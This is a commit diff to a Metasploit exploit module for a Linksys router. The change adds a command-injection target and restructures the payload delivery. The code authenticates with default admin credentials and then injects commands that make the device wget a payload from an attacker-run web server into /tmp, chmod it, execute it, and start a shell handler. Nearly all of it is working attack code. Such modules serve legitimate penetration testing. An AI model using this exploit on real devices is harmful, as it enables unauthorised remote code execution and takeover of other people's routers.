cmd payload working, most feedback included

unstable
m-1-k-3 2013-03-29 14:43:48 +01:00
parent dfd451f875
commit cfeddf3f34
1 changed files with 82 additions and 57 deletions

View File

@ -30,15 +30,26 @@ class Metasploit3 < Msf::Exploit::Remote
],
'DisclosureDate' => 'Feb 05 2013',
'Privileged' => true,
'Platform' => [ 'linux' ],
'Arch' => ARCH_MIPSLE,
'Targets' => [[ 'Automatic', { }]],
'Payload' =>
{
'Space' => 1024,
'DisableNops' => true,
},
'DefaultTarget' => 0
#'Platform' => 'linux',
#'Arch' => ARCH_MIPSLE,
'Targets' =>
[
[ 'Unix CMD',
{
'Arch' => ARCH_CMD,
'Platform' => 'unix',
#only payload cmd/unix/generic should be possible
}
],
[ 'Linux Payload',
{
'Arch' => ARCH_MIPSLE,
'Platform' => 'linux',
'DisableNops' => true,
}
],
],
'DefaultTarget' => 1,
))
register_options(
@ -47,12 +58,11 @@ class Metasploit3 < Msf::Exploit::Remote
OptString.new('USERNAME', [ true, 'The username to authenticate as', 'admin' ]),
OptString.new('PASSWORD', [ true, 'The password for the specified username', 'admin' ]),
OptString.new('DOWNHOST', [ false, 'The host to request the MIPS payload from' ]),
OptString.new('DOWNFILE', [ false, 'Filename to download, (default: random)', nil ]),
OptString.new('DOWNFILE', [ false, 'Filename to download, (default: random)' ]),
OptString.new('SRVHOST', [ true, 'The local host to listen on. This must be an address on the local machine' ]),
], self.class)
end
#MISSING - command execution payload
def request(cmd,user,pass,uri)
begin
@ -91,30 +101,6 @@ class Metasploit3 < Msf::Exploit::Remote
rhost = datastore['RHOST']
rport = datastore['RPORT']
# We must regenerate the payload-> not sure if this is the right way
arch = "ARCH_MIPSLE"
plat = "linux"
p = exploit_regenerate_payload(plat, arch)
@pl = p.encoded_exe
#
# start our server
#
resource_uri = '/' + downfile
service_url = 'http://' + datastore['SRVHOST'] + ':' + datastore['SRVPORT'].to_s + resource_uri
print_status("#{rhost}:#{rport} - Starting up our web service on #{service_url} ...")
start_service({'Uri' => {
'Proc' => Proc.new { |cli, req|
on_request_uri(cli, req)
},
'Path' => resource_uri
}})
if (datastore['DOWNHOST'])
service_url = 'http://' + datastore['DOWNHOST'] + ':' + datastore['SRVPORT'].to_s + resource_uri
end
#
# testing Login
#
@ -143,36 +129,75 @@ class Metasploit3 < Msf::Exploit::Remote
return
end
print_status("#{rhost}:#{rport} - Asking the Linksys device to download #{service_url}")
if target.name =~ /CMD/
cmd = payload.encoded
request(cmd,user,pass,uri)
else
#lets get some shells ...
#this filename is used to store the payload on the device
filename = rand_text_alpha_lower(8)
# We must regenerate the payload-> not sure if this is the right way
arch = "ARCH_MIPSLE"
plat = "linux"
p = exploit_regenerate_payload(plat, arch)
cmd = "/usr/bin/wget #{service_url} -O /tmp/#{filename}"
@pl = p.encoded_exe
request(cmd,user,pass,uri)
#
# start our server
#
resource_uri = '/' + downfile
#
# chmod
#
if (datastore['DOWNHOST'])
service_url = 'http://' + datastore['DOWNHOST'] + ':' + datastore['SRVPORT'].to_s + resource_uri
else
#easy way ... do not use SSL ;)
if datastore['SSL']
ssl_restore = true
datastore['SSL'] = false
end
cmd = "chmod 777 /tmp/#{filename}"
service_url = 'http://' + datastore['SRVHOST'] + ':' + datastore['SRVPORT'].to_s + resource_uri
print_status("#{rhost}:#{rport} - Starting up our web service on #{service_url} ...")
start_service({'Uri' => {
'Proc' => Proc.new { |cli, req|
on_request_uri(cli, req)
},
'Path' => resource_uri
}})
print_status("#{rhost}:#{rport} - Asking the Linksys device to prepare #{downfile}")
datastore['SSL'] = true if ssl_restore
end
request(cmd,user,pass,uri)
print_status("#{rhost}:#{rport} - Asking the Linksys device to download #{service_url}")
#this filename is used to store the payload on the device
filename = rand_text_alpha_lower(8)
cmd = "/usr/bin/wget #{service_url} -O /tmp/#{filename}"
request(cmd,user,pass,uri)
#
# chmod
#
cmd = "chmod 777 /tmp/#{filename}"
print_status("#{rhost}:#{rport} - Asking the Linksys device to prepare #{downfile}")
request(cmd,user,pass,uri)
#
# execute
#
cmd = "/tmp/#{filename}"
print_status("#{rhost}:#{rport} - Asking the Linksys device to execute #{downfile}")
request(cmd,user,pass,uri)
end
#
# execute
#
cmd = "/tmp/#{filename}"
print_status("#{rhost}:#{rport} - Asking the Linksys device to execute #{downfile}")
request(cmd,user,pass,uri)
handler
end